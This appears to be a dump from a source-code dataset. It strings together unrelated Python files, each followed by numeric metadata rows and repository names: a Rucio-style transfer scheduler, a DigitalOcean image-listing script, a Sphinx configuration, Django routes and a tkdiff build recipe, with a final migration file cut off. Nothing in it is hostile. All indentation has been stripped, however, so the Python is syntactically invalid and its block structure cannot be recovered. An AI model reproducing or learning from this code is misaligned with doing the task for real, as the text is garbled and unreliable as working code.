# TAPE should not mixed with Disk and should not use as first try
# If there is a source whose ranking is no less than the Tape ranking, Tape will not be used.
if rses_info[source_rse_id]['rse_type'] == RSEType.TAPE or rses_info[source_rse_id]['rse_type'] == 'TAPE':
# current src_rse is Tape
if not allow_tape_source:
continue
if not transfers[id]['bring_online']:
# the sources already founded are disks.
avail_top_ranking = None
founded_sources = transfers[id]['sources']
for founded_source in founded_sources:
if avail_top_ranking is None:
avail_top_ranking = founded_source[3]
continue
if founded_source[3] is not None and founded_source[3] > avail_top_ranking:
avail_top_ranking = founded_source[3]
if avail_top_ranking >= ranking:
# current Tape source is not the highest ranking, will use disk sources
continue
else:
transfers[id]['sources'] = []
transfers[id]['bring_online'] = bring_online_local
transfer_src_type = "TAPE"
transfers[id]['file_metadata']['src_type'] = transfer_src_type
transfers[id]['file_metadata']['src_rse'] = rse
else:
# the sources already founded is Tape too.
# multiple Tape source replicas are not allowed in FTS3.
if transfers[id]['sources'][0][3] > ranking or (transfers[id]['sources'][0][3] == ranking and transfers[id]['sources'][0][4] >= link_ranking):
continue
else:
transfers[id]['sources'] = []
transfers[id]['bring_online'] = bring_online_local
transfers[id]['file_metadata']['src_rse'] = rse
else:
# current src_rse is Disk
if transfers[id]['bring_online']:
# the founded sources are Tape
avail_top_ranking = None
founded_sources = transfers[id]['sources']
for founded_source in founded_sources:
if avail_top_ranking is None:
avail_top_ranking = founded_source[3]
continue
if founded_source[3] is not None and founded_source[3] > avail_top_ranking:
avail_top_ranking = founded_source[3]
if ranking >= avail_top_ranking:
# current disk replica has higher ranking than founded sources
# remove founded Tape sources
transfers[id]['sources'] = []
transfers[id]['bring_online'] = None
transfer_src_type = "DISK"
transfers[id]['file_metadata']['src_type'] = transfer_src_type
transfers[id]['file_metadata']['src_rse'] = rse
else:
continue
# Get protocol
source_rse_id_key = '%s_%s' % (source_rse_id, '_'.join(schemes))
if source_rse_id_key not in protocols:
try:
protocols[source_rse_id_key] = rsemgr.create_protocol(rses_info[source_rse_id], 'read', schemes)
except RSEProtocolNotSupported:
logging.error('Operation "read" not supported by %s with schemes %s' % (rses_info[source_rse_id]['rse'], schemes))
if id not in reqs_scheme_mismatch:
reqs_scheme_mismatch.append(id)
continue
source_url = protocols[source_rse_id_key].lfns2pfns(lfns={'scope': scope, 'name': name, 'path': path}).values()[0]
# transfers[id]['src_urls'].append((source_rse_id, source_url))
transfers[id]['sources'].append((rse, source_url, source_rse_id, ranking, link_ranking))
except:
logging.critical("Exception happened when trying to get transfer for request %s: %s" % (id, traceback.format_exc()))
break
return transfers, reqs_no_source, reqs_scheme_mismatch, reqs_only_tape_source
@read_session
def get_stagein_requests_and_source_replicas(process=None, total_processes=None, thread=None, total_threads=None, failover_schemes=None,
limit=None, activity=None, older_than=None, rses=None, mock=False, schemes=None,
bring_online=43200, retry_other_fts=False, session=None):
req_sources = request.list_stagein_requests_and_source_replicas(process=process, total_processes=total_processes, thread=thread, total_threads=total_threads,
limit=limit, activity=activity, older_than=older_than, rses=rses, session=session)
transfers, rses_info, protocols, rse_attrs, reqs_no_source = {}, {}, {}, {}, []
for id, rule_id, scope, name, md5, adler32, bytes, activity, attributes, dest_rse_id, source_rse_id, rse, deterministic, rse_type, path, staging_buffer, retry_count, previous_attempt_id, src_url, ranking in req_sources:
try:
if rses and dest_rse_id not in rses:
continue
current_schemes = schemes
if previous_attempt_id and failover_schemes:
current_schemes = failover_schemes
if id not in transfers:
if id not in reqs_no_source:
reqs_no_source.append(id)
if not src_url:
# source_rse_id will be None if no source replicas
# rse will be None if rse is staging area
# staging_buffer will be None if rse has no key 'staging_buffer'
if source_rse_id is None or rse is None or staging_buffer is None:
continue
# Get destination rse information and protocol
if dest_rse_id not in rses_info:
dest_rse = rse_core.get_rse_name(rse_id=dest_rse_id, session=session)
rses_info[dest_rse_id] = rsemgr.get_rse_info(dest_rse, session=session)
if staging_buffer != rses_info[dest_rse_id]['rse']:
continue
attr = None
if attributes:
if type(attributes) is dict:
attr = json.loads(json.dumps(attributes))
else:
attr = json.loads(str(attributes))
source_replica_expression = attr["source_replica_expression"] if "source_replica_expression" in attr else None
if source_replica_expression:
try:
parsed_rses = parse_expression(source_replica_expression, session=session)
except InvalidRSEExpression, e:
logging.error("Invalid RSE exception %s: %s" % (source_replica_expression, e))
continue
else:
allowed_rses = [x['rse'] for x in parsed_rses]
if rse not in allowed_rses:
continue
if source_rse_id not in rses_info:
# source_rse = rse_core.get_rse_name(rse_id=source_rse_id, session=session)
source_rse = rse
rses_info[source_rse_id] = rsemgr.get_rse_info(source_rse, session=session)
if source_rse_id not in rse_attrs:
rse_attrs[source_rse_id] = get_rse_attributes(source_rse_id, session=session)
if source_rse_id not in protocols:
protocols[source_rse_id] = rsemgr.create_protocol(rses_info[source_rse_id], 'write', current_schemes)
# we need to set the spacetoken if we use SRM
dest_spacetoken = None
if protocols[source_rse_id].attributes and \
'extended_attributes' in protocols[source_rse_id].attributes and \
protocols[source_rse_id].attributes['extended_attributes'] and \
'space_token' in protocols[source_rse_id].attributes['extended_attributes']:
dest_spacetoken = protocols[source_rse_id].attributes['extended_attributes']['space_token']
source_url = protocols[source_rse_id].lfns2pfns(lfns={'scope': scope, 'name': name, 'path': path}).values()[0]
else:
# source_rse_id will be None if no source replicas
# rse will be None if rse is staging area
# staging_buffer will be None if rse has no key 'staging_buffer'
if source_rse_id is None or rse is None or staging_buffer is None:
continue
attr = None
if attributes:
if type(attributes) is dict:
attr = json.loads(json.dumps(attributes))
else:
attr = json.loads(str(attributes))
# to get space token and fts attribute
if source_rse_id not in rses_info:
# source_rse = rse_core.get_rse_name(rse_id=source_rse_id, session=session)
source_rse = rse
rses_info[source_rse_id] = rsemgr.get_rse_info(source_rse, session=session)
if source_rse_id not in rse_attrs:
rse_attrs[source_rse_id] = get_rse_attributes(source_rse_id, session=session)
if source_rse_id not in protocols:
protocols[source_rse_id] = rsemgr.create_protocol(rses_info[source_rse_id], 'write', current_schemes)
# we need to set the spacetoken if we use SRM
dest_spacetoken = None
if protocols[source_rse_id].attributes and \
'extended_attributes' in protocols[source_rse_id].attributes and \
protocols[source_rse_id].attributes['extended_attributes'] and \
'space_token' in protocols[source_rse_id].attributes['extended_attributes']:
dest_spacetoken = protocols[source_rse_id].attributes['extended_attributes']['space_token']
source_url = src_url
fts_hosts = rse_attrs[source_rse_id].get('fts', None)
if not fts_hosts:
logging.error('Source RSE %s FTS attribute not defined - SKIP REQUEST %s' % (rse, id))
continue
if not retry_count:
retry_count = 0
fts_list = fts_hosts.split(",")
external_host = fts_list[0]
if retry_other_fts:
external_host = fts_list[retry_count % len(fts_list)]
if id in reqs_no_source:
reqs_no_source.remove(id)
file_metadata = {'request_id': id,
'scope': scope,
'name': name,
'activity': activity,
'request_type': str(RequestType.STAGEIN).lower(),
'src_type': "TAPE",
'dst_type': "DISK",
'src_rse': rse,
'dst_rse': rse,
'src_rse_id': source_rse_id,
'dest_rse_id': dest_rse_id,
'filesize': bytes,
'md5': md5,
'adler32': adler32}
if previous_attempt_id:
file_metadata['previous_attempt_id'] = previous_attempt_id
transfers[id] = {'request_id': id,
# 'src_urls': [source_url],
'sources': [(rse, source_url, source_rse_id, ranking)],
'dest_urls': [source_url],
'src_spacetoken': None,
'dest_spacetoken': dest_spacetoken,
'overwrite': False,
'bring_online': bring_online,
'copy_pin_lifetime': attr.get('lifetime', -1) if attr else -1,
'external_host': external_host,
'selection_strategy': 'auto',
'rule_id': rule_id,
'file_metadata': file_metadata}
logging.debug("Transfer for request(%s): %s" % (id, transfers[id]))
except:
logging.critical("Exception happened when trying to get transfer for request %s: %s" % (id, traceback.format_exc()))
break
return transfers, reqs_no_source
def get_stagein_transfers(process=None, total_processes=None, thread=None, total_threads=None, failover_schemes=None,
limit=None, activity=None, older_than=None, rses=None, mock=False, schemes=None, bring_online=43200, retry_other_fts=False, session=None):
transfers, reqs_no_source = get_stagein_requests_and_source_replicas(process=process, total_processes=total_processes, thread=thread, total_threads=total_threads,
limit=limit, activity=activity, older_than=older_than, rses=rses, mock=mock, schemes=schemes,
bring_online=bring_online, retry_other_fts=retry_other_fts, failover_schemes=failover_schemes,
session=session)
request.set_requests_state(reqs_no_source, RequestState.NO_SOURCES)
return transfers
def handle_requests_with_scheme_mismatch(transfers=None, reqs_scheme_mismatch=None, schemes=None):
if not reqs_scheme_mismatch:
return transfers
for request_id in reqs_scheme_mismatch:
logging.debug("Request %s with schemes %s has mismatched sources, will handle it" % (request_id, schemes))
found_avail_source = 0
if request_id in transfers:
for source in transfers[request_id]['sources']:
ranking = source[3]
if ranking >= 0:
# if ranking less than 0, it means it already failed at least one time.
found_avail_source = 1
break
if not found_avail_source:
# todo
# try to force scheme to regenerate the dest_url and src_url
# transfer = get_transfer_from_request_id(request_id, scheme='srm') # if rsemgr can select protocol by order, we can change
# if transfer:
# transfers[request_id] = transfer
pass
return transfers
def mock_sources(sources):
tmp_sources = []
for s in sources:
tmp_sources.append((s[0], ':'.join(['mock'] + s[1].split(':')[1:]), s[2], s[3]))
sources = tmp_sources
return tmp_sources
def sort_link_ranking(sources):
rank_sources = {}
ret_sources = []
for source in sources:
rse, source_url, source_rse_id, ranking, link_ranking = source
if link_ranking not in rank_sources:
rank_sources[link_ranking] = []
rank_sources[link_ranking].append(source)
rank_keys = rank_sources.keys()
rank_keys.sort(reverse=True)
for rank_key in rank_keys:
sources_list = rank_sources[rank_key]
random.shuffle(sources_list)
ret_sources = ret_sources + sources_list
return ret_sources
def sort_ranking(sources):
logging.debug("Sources before sorting: %s" % sources)
rank_sources = {}
ret_sources = []
for source in sources:
# ranking is from sources table, is the retry times
# link_ranking is from distances table, is the link rank.
# link_ranking should not be None(None means no link, the source will not be used).
rse, source_url, source_rse_id, ranking, link_ranking = source
if ranking is None:
ranking = 0
if ranking not in rank_sources:
rank_sources[ranking] = []
rank_sources[ranking].append(source)
rank_keys = rank_sources.keys()
rank_keys.sort(reverse=True)
for rank_key in rank_keys:
sources_list = sort_link_ranking(rank_sources[rank_key])
ret_sources = ret_sources + sources_list
logging.debug("Sources after sorting: %s" % ret_sources)
return ret_sources
def get_transfers(process=None, total_processes=None, thread=None, total_threads=None,
failover_schemes=None, limit=None, activity=None, older_than=None,
rses=None, schemes=None, mock=False, max_sources=4, bring_online=43200,
retry_other_fts=False, session=None):
transfers, reqs_no_source, reqs_scheme_mismatch, reqs_only_tape_source = get_transfer_requests_and_source_replicas(process=process, total_processes=total_processes, thread=thread, total_threads=total_threads,
limit=limit, activity=activity, older_than=older_than, rses=rses, schemes=schemes,
bring_online=bring_online, retry_other_fts=retry_other_fts,
failover_schemes=failover_schemes, session=session)
request.set_requests_state(reqs_no_source, RequestState.NO_SOURCES)
request.set_requests_state(reqs_only_tape_source, RequestState.ONLY_TAPE_SOURCES)
request.set_requests_state(reqs_scheme_mismatch, RequestState.MISMATCH_SCHEME)
for request_id in transfers:
sources = transfers[request_id]['sources']
sources = sort_ranking(sources)
if len(sources) > max_sources:
sources = sources[:max_sources]
if not mock:
transfers[request_id]['sources'] = sources
else:
transfers[request_id]['sources'] = mock_sources(sources)
# remove link_ranking in the final sources
sources = transfers[request_id]['sources']
transfers[request_id]['sources'] = []
for source in sources:
rse, source_url, source_rse_id, ranking, link_ranking = source
transfers[request_id]['sources'].append((rse, source_url, source_rse_id, ranking))
transfers[request_id]['file_metadata']['src_rse'] = sources[0][0]
transfers[request_id]['file_metadata']['src_rse_id'] = sources[0][2]
logging.debug("Transfer for request(%s): %s" % (request_id, transfers[request_id]))
return transfers
def submit_transfer(external_host, job, submitter='submitter', cachedir=None, process=0, thread=0, timeout=None):
# prepare submitting
xfers_ret = {}
try:
for file in job['files']:
file_metadata = file['metadata']
request_id = file_metadata['request_id']
log_str = '%s:%s PREPARING REQUEST %s DID %s:%s TO SUBMITTING STATE PREVIOUS %s FROM %s TO %s USING %s ' % (process, thread,
file_metadata['request_id'],
file_metadata['scope'],
file_metadata['name'],
file_metadata['previous_attempt_id'] if 'previous_attempt_id' in file_metadata else None,
file['sources'],
file['destinations'],
external_host)
xfers_ret[request_id] = {'state': RequestState.SUBMITTING, 'external_host': external_host, 'external_id': None, 'dest_url': file['destinations'][0]}
logging.info("%s" % (log_str))
xfers_ret[request_id]['file'] = file
logging.debug("%s:%s start to prepare transfer" % (process, thread))
request.prepare_request_transfers(xfers_ret)
logging.debug("%s:%s finished to prepare transfer" % (process, thread))
except:
logging.error("%s:%s Failed to prepare requests %s state to SUBMITTING(Will not submit jobs but return directly) with error: %s" % (process, thread, xfers_ret.keys(), traceback.format_exc()))
return
# submit the job
eid = None
try:
ts = time.time()
logging.info("%s:%s About to submit job to %s with timeout %s" % (process, thread, external_host, timeout))
eid = request.submit_bulk_transfers(external_host, files=job['files'], transfertool='fts3', job_params=job['job_params'], timeout=timeout)
duration = time.time() - ts
logging.info("%s:%s Submit job %s to %s in %s seconds" % (process, thread, eid, external_host, duration))
record_timer('daemons.conveyor.%s.submit_bulk_transfer.per_file' % submitter, (time.time() - ts) * 1000 / len(job['files']))
record_counter('daemons.conveyor.%s.submit_bulk_transfer' % submitter, len(job['files']))
record_timer('daemons.conveyor.%s.submit_bulk_transfer.files' % submitter, len(job['files']))
except Exception, ex:
logging.error("Failed to submit a job with error %s: %s" % (str(ex), traceback.format_exc()))
# register transfer
xfers_ret = {}
try:
for file in job['files']:
file_metadata = file['metadata']
request_id = file_metadata['request_id']
log_str = '%s:%s COPYING REQUEST %s DID %s:%s USING %s' % (process, thread, file_metadata['request_id'], file_metadata['scope'], file_metadata['name'], external_host)
if eid:
xfers_ret[request_id] = {'scope': file_metadata['scope'],
'name': file_metadata['name'],
'state': RequestState.SUBMITTED,
'external_host': external_host,
'external_id': eid,
'request_type': file.get('request_type', None),
'dst_rse': file_metadata.get('dst_rse', None),
'src_rse': file_metadata.get('src_rse', None),
'src_rse_id': file_metadata['src_rse_id'],
'metadata': file_metadata}
log_str += 'with state(%s) with eid(%s)' % (RequestState.SUBMITTED, eid)
logging.info("%s" % (log_str))
else:
xfers_ret[request_id] = {'scope': file_metadata['scope'],
'name': file_metadata['name'],
'state': RequestState.SUBMISSION_FAILED,
'external_host': external_host,
'external_id': None,
'request_type': file.get('request_type', None),
'dst_rse': file_metadata.get('dst_rse', None),
'src_rse': file_metadata.get('src_rse', None),
'src_rse_id': file_metadata['src_rse_id'],
'metadata': file_metadata}
log_str += 'with state(%s) with eid(%s)' % (RequestState.SUBMISSION_FAILED, None)
logging.warn("%s" % (log_str))
logging.debug("%s:%s start to register transfer state" % (process, thread))
request.set_request_transfers_state(xfers_ret, datetime.datetime.utcnow())
logging.debug("%s:%s finished to register transfer state" % (process, thread))
except:
logging.error("%s:%s Failed to register transfer state with error: %s" % (process, thread, traceback.format_exc()))
try:
if eid:
logging.info("%s:%s Cancel transfer %s on %s" % (process, thread, eid, external_host))
request.cancel_request_external_id(eid, external_host)
except:
logging.error("%s:%s Failed to cancel transfers %s on %s with error: %s" % (process, thread, eid, external_host, traceback.format_exc()))
def schedule_requests():
try:
logging.info("Throttler retrieve requests statistics")
results = request.get_stats_by_activity_dest_state(state=[RequestState.QUEUED, RequestState.SUBMITTING, RequestState.SUBMITTED, RequestState.WAITING])
result_dict = {}
for activity, dest_rse_id, account, state, counter in results:
threshold = request.get_config_limit(activity, dest_rse_id)
if threshold or (counter and (state == RequestState.WAITING)):
if activity not in result_dict:
result_dict[activity] = {}
if dest_rse_id not in result_dict[activity]:
result_dict[activity][dest_rse_id] = {'waiting': 0, 'transfer': 0, 'threshold': threshold, 'accounts': {}}
if account not in result_dict[activity][dest_rse_id]['accounts']:
result_dict[activity][dest_rse_id]['accounts'][account] = {'waiting': 0, 'transfer': 0}
if state == RequestState.WAITING:
result_dict[activity][dest_rse_id]['accounts'][account]['waiting'] += counter
result_dict[activity][dest_rse_id]['waiting'] += counter
else:
result_dict[activity][dest_rse_id]['accounts'][account]['transfer'] += counter
result_dict[activity][dest_rse_id]['transfer'] += counter
for activity in result_dict:
for dest_rse_id in result_dict[activity]:
threshold = result_dict[activity][dest_rse_id]['threshold']
transfer = result_dict[activity][dest_rse_id]['transfer']
waiting = result_dict[activity][dest_rse_id]['waiting']
logging.debug("Request status for %s at %s: %s" % (activity, activity, result_dict[activity][dest_rse_id]))
if threshold is None:
logging.debug("Throttler remove limits(threshold: %s) and release all waiting requests for acitivity %s, rse_id %s" % (threshold, activity, dest_rse_id))
rse_core.delete_rse_transfer_limits(rse=None, activity=activity, rse_id=dest_rse_id)
request.release_waiting_requests(rse=None, activity=activity, rse_id=dest_rse_id)
rse_name = rse_core.get_rse_name(rse_id=dest_rse_id)
record_counter('daemons.conveyor.throttler.delete_rse_transfer_limits.%s.%s' % (activity, rse_name))
elif transfer + waiting > threshold:
logging.debug("Throttler set limits for acitivity %s, rse_id %s" % (activity, dest_rse_id))
rse_core.set_rse_transfer_limits(rse=None, activity=activity, rse_id=dest_rse_id, max_transfers=threshold, transfers=transfer, waitings=waiting)
rse_name = rse_core.get_rse_name(rse_id=dest_rse_id)
record_gauge('daemons.conveyor.throttler.set_rse_transfer_limits.%s.%s.max_transfers' % (activity, rse_name), threshold)
record_gauge('daemons.conveyor.throttler.set_rse_transfer_limits.%s.%s.transfers' % (activity, rse_name), transfer)
record_gauge('daemons.conveyor.throttler.set_rse_transfer_limits.%s.%s.waitings' % (activity, rse_name), waiting)
if transfer < 0.8 * threshold:
# release requests on account
nr_accounts = len(result_dict[activity][dest_rse_id]['accounts'])
if nr_accounts < 1:
nr_accounts = 1
to_release = threshold - transfer
threshold_per_account = math.ceil(threshold / nr_accounts)
to_release_per_account = math.ceil(to_release / nr_accounts)
accounts = result_dict[activity][dest_rse_id]['accounts']
for account in accounts:
if nr_accounts == 1:
logging.debug("Throttler release %s waiting requests for acitivity %s, rse_id %s, account %s " % (to_release, activity, dest_rse_id, account))
request.release_waiting_requests(rse=None, activity=activity, rse_id=dest_rse_id, account=account, count=to_release)
record_gauge('daemons.conveyor.throttler.release_waiting_requests.%s.%s.%s' % (activity, rse_name, account), to_release)
elif accounts[account]['transfer'] > threshold_per_account:
logging.debug("Throttler will not release waiting requests for acitivity %s, rse_id %s, account %s: It queued more transfers than its share " %
(accounts[account]['waiting'], activity, dest_rse_id, account))
nr_accounts -= 1
to_release_per_account = math.ceil(to_release / nr_accounts)
elif accounts[account]['waiting'] < to_release_per_account:
logging.debug("Throttler release %s waiting requests for acitivity %s, rse_id %s, account %s " % (accounts[account]['waiting'], activity, dest_rse_id, account))
request.release_waiting_requests(rse=None, activity=activity, rse_id=dest_rse_id, account=account, count=accounts[account]['waiting'])
record_gauge('daemons.conveyor.throttler.release_waiting_requests.%s.%s.%s' % (activity, rse_name, account), accounts[account]['waiting'])
to_release = to_release - accounts[account]['waiting']
nr_accounts -= 1
to_release_per_account = math.ceil(to_release / nr_accounts)
else:
logging.debug("Throttler release %s waiting requests for acitivity %s, rse_id %s, account %s " % (to_release_per_account, activity, dest_rse_id, account))
request.release_waiting_requests(rse=None, activity=activity, rse_id=dest_rse_id, account=account, count=to_release_per_account)
record_gauge('daemons.conveyor.throttler.release_waiting_requests.%s.%s.%s' % (activity, rse_name, account), to_release_per_account)
to_release = to_release - to_release_per_account
nr_accounts -= 1
elif waiting > 0:
logging.debug("Throttler remove limits(threshold: %s) and release all waiting requests for acitivity %s, rse_id %s" % (threshold, activity, dest_rse_id))
rse_core.delete_rse_transfer_limits(rse=None, activity=activity, rse_id=dest_rse_id)
request.release_waiting_requests(rse=None, activity=activity, rse_id=dest_rse_id)
rse_name = rse_core.get_rse_name(rse_id=dest_rse_id)
record_counter('daemons.conveyor.throttler.delete_rse_transfer_limits.%s.%s' % (activity, rse_name))
except:
logging.warning("Failed to schedule requests, error: %s" % (traceback.format_exc()))
| 54.926625 | 223 | 0.537494 | 8,395 | 78,600 | 4.787135 | 0.060393 | 0.024759 | 0.01814 | 0.009306 | 0.64574 | 0.595576 | 0.540485 | 0.50214 | 0.481835 | 0.445183 | 0 | 0.006353 | 0.37117 | 78,600 | 1,430 | 224 | 54.965035 | 0.806741 | 0.065585 | 0 | 0.507042 | 0 | 0.004401 | 0.138667 | 0.018589 | 0 | 0 | 0 | 0.000699 | 0 | 0 | null | null | 0.00088 | 0.016725 | null | null | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
3830df09c72d6bc67a2ca0f6763f909dda7df0af | 574 | py | Python | list_images.py | mrowacz/digital_api_scripts | bc8758862a6fccc982c9e5ae05e6590e88dc9059 | [
"MIT"
] | null | null | null | list_images.py | mrowacz/digital_api_scripts | bc8758862a6fccc982c9e5ae05e6590e88dc9059 | [
"MIT"
] | null | null | null | list_images.py | mrowacz/digital_api_scripts | bc8758862a6fccc982c9e5ae05e6590e88dc9059 | [
"MIT"
] | null | null | null | import os
import json
import requests
url = "https://api.digitalocean.com/v2/images?per_page=999"
headers = {"Authorization" : "Bearer " + os.environ['DIGITALOCEAN_ACCESS_TOKEN']}
r = requests.get(url, headers=headers)
distros = {}
for entry in r.json()["images"]:
s = "(" + str(entry["id"]) + ") " + entry["name"]
if entry["distribution"] in distros:
distros[entry["distribution"]].append(s)
else:
distros[entry["distribution"]] = [s]
for key in distros:
print key + ":"
for list_elem in distros[key]:
print "\t" + list_elem
| 26.090909 | 81 | 0.634146 | 74 | 574 | 4.851351 | 0.527027 | 0.142061 | 0.133705 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.008639 | 0.19338 | 574 | 21 | 82 | 27.333333 | 0.766739 | 0 | 0 | 0 | 0 | 0 | 0.261324 | 0.043554 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.176471 | null | null | 0.117647 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
3837ed605953a3a84f61221e934440108abfdf2f | 2,790 | py | Python | docs/source/conf.py | ducouloa/ml4ir | 75aeecaff11682a7bd71c5521e59c449c43c3f9f | [
"Apache-2.0"
] | 70 | 2020-02-05T00:42:29.000Z | 2022-03-07T09:33:01.000Z | docs/source/conf.py | ducouloa/ml4ir | 75aeecaff11682a7bd71c5521e59c449c43c3f9f | [
"Apache-2.0"
] | 102 | 2020-01-31T21:12:55.000Z | 2022-03-28T17:04:43.000Z | docs/source/conf.py | ducouloa/ml4ir | 75aeecaff11682a7bd71c5521e59c449c43c3f9f | [
"Apache-2.0"
] | 23 | 2020-02-05T00:43:07.000Z | 2022-02-13T13:33:51.000Z | # Configuration file for the Sphinx documentation builder.
#
# This file only contains a selection of the most common options. For a full
# list see the documentation:
# https://www.sphinx-doc.org/en/master/usage/configuration.html
# -- Path setup --------------------------------------------------------------
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
#
import os
import sys
from typing import List
from recommonmark.transform import AutoStructify
# Set python project root
sys.path.insert(0, os.path.abspath("../../python/"))
# The master toctree document
master_doc = "index"
# -- Project information -----------------------------------------------------
project = "ml4ir"
copyright = "2020, Search Relevance (Salesforce.com, Inc.)"
author = "Search Relevance (Salesforce.com, Inc.)"
# The full version, including alpha/beta/rc tags
release = "0.2.0"
# -- General configuration ---------------------------------------------------
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
extensions: List = [
"sphinx.ext.autodoc",
"sphinx.ext.coverage",
"sphinx.ext.napoleon",
"recommonmark",
] # noqa: E501
# Add any paths that contain templates here, relative to this directory.
templates_path: List = ["_templates"]
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
# This pattern also affects html_static_path and html_extra_path.
exclude_patterns: List = []
# -- Options for HTML output -------------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
#
html_theme: str = "default"
# Title appended to <title> tag of individual pages
html_title: str = "ml4ir"
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path: List = ["_static"]
# Overriding default theme with custom CSS for text wrapping bug on tables
html_context = {
"css_files": ["_static/theme_overrides.css"],
}
def setup(app):
app.add_config_value(
"recommonmark_config", {"enable_eval_rst": True}, True
) # noqa E501
app.add_transform(AutoStructify)
# Use both class definition doc and constructor doc for
# generating sphinx docs for python classes
autoclass_content = "both"
autodoc_member_order = "bysource"
| 32.44186 | 79 | 0.684946 | 367 | 2,790 | 5.13624 | 0.476839 | 0.02122 | 0.020159 | 0.029708 | 0.084881 | 0 | 0 | 0 | 0 | 0 | 0 | 0.006783 | 0.15448 | 2,790 | 85 | 80 | 32.823529 | 0.792285 | 0.653405 | 0 | 0 | 0 | 0 | 0.312567 | 0.029001 | 0 | 0 | 0 | 0.011765 | 0 | 1 | 0.032258 | false | 0 | 0.129032 | 0 | 0.16129 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
383c4dbc8788963ff0f2227ca34717a2ddb9d2f7 | 334 | py | Python | backend/api/room/urls.py | jeraldlyh/HoloRPG | e835eb1f7a6b18c87007ecf8168d959b4e176a23 | [
"MIT"
] | null | null | null | backend/api/room/urls.py | jeraldlyh/HoloRPG | e835eb1f7a6b18c87007ecf8168d959b4e176a23 | [
"MIT"
] | null | null | null | backend/api/room/urls.py | jeraldlyh/HoloRPG | e835eb1f7a6b18c87007ecf8168d959b4e176a23 | [
"MIT"
] | null | null | null | from django.urls import path, include
from rest_framework.routers import DefaultRouter
from .views import DungeonViewSet, RoomViewSet
router = DefaultRouter()
router.register(r"dungeon", DungeonViewSet, basename="dungeon")
router.register(r"room", RoomViewSet, basename="room")
urlpatterns = [
path("", include(router.urls)),
] | 27.833333 | 63 | 0.775449 | 38 | 334 | 6.789474 | 0.526316 | 0.085271 | 0.116279 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.10479 | 334 | 12 | 64 | 27.833333 | 0.862876 | 0 | 0 | 0 | 0 | 0 | 0.065672 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.333333 | 0 | 0.333333 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 |
384212c693fe183ca43529aa8c41250ed2908324 | 656 | py | Python | hardhat/recipes/tkdiff.py | stangelandcl/hardhat | 1ad0c5dec16728c0243023acb9594f435ef18f9c | [
"MIT"
] | null | null | null | hardhat/recipes/tkdiff.py | stangelandcl/hardhat | 1ad0c5dec16728c0243023acb9594f435ef18f9c | [
"MIT"
] | null | null | null | hardhat/recipes/tkdiff.py | stangelandcl/hardhat | 1ad0c5dec16728c0243023acb9594f435ef18f9c | [
"MIT"
] | null | null | null | from .base import GnuRecipe
class TkDiffRecipe(GnuRecipe):
def __init__(self, *args, **kwargs):
super(TkDiffRecipe, self).__init__(*args, **kwargs)
self.sha256 = '734bb417184c10072eb64e8d27424533' \
'8e41b7fdeff661b5ef30e89f3e3aa357'
self.name = 'tkdiff'
self.version = '4.2'
self.depends = ['tcl', 'tk']
self.url = 'https://downloads.sourceforge.net/project/tkdiff/tkdiff/' \
'$version/tkdiff-$version.tar.gz'
self.install_args = ['cp', 'tkdiff', '%s/bin' % self.prefix_dir]
def configure(self):
pass
def compile(self):
pass
| 29.818182 | 79 | 0.592988 | 65 | 656 | 5.830769 | 0.615385 | 0.05277 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.097917 | 0.268293 | 656 | 21 | 80 | 31.238095 | 0.691667 | 0 | 0 | 0.125 | 0 | 0 | 0.272866 | 0.144817 | 0 | 0 | 0 | 0 | 0 | 1 | 0.1875 | false | 0.125 | 0.0625 | 0 | 0.3125 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
3847bfe54774d87addfadb9073d4d4d898715bfd | 1,552 | py | Python | steps/app/migrations/0006_auto_20180330_1816.py | VishalCR7/steps | 521e9317b0973795e9f2b98df9d41908ae95e042 | [
"Apache-2.0"
] | null | null | null | steps/app/migrations/0006_auto_20180330_1816.py | VishalCR7/steps | 521e9317b0973795e9f2b98df9d41908ae95e042 | [
"Apache-2.0"
] | null | null | null | steps/app/migrations/0006_auto_20180330_1816.py | VishalCR7/steps | 521e9317b0973795e9f2b98df9d41908ae95e042 | [
"Apache-2.0"
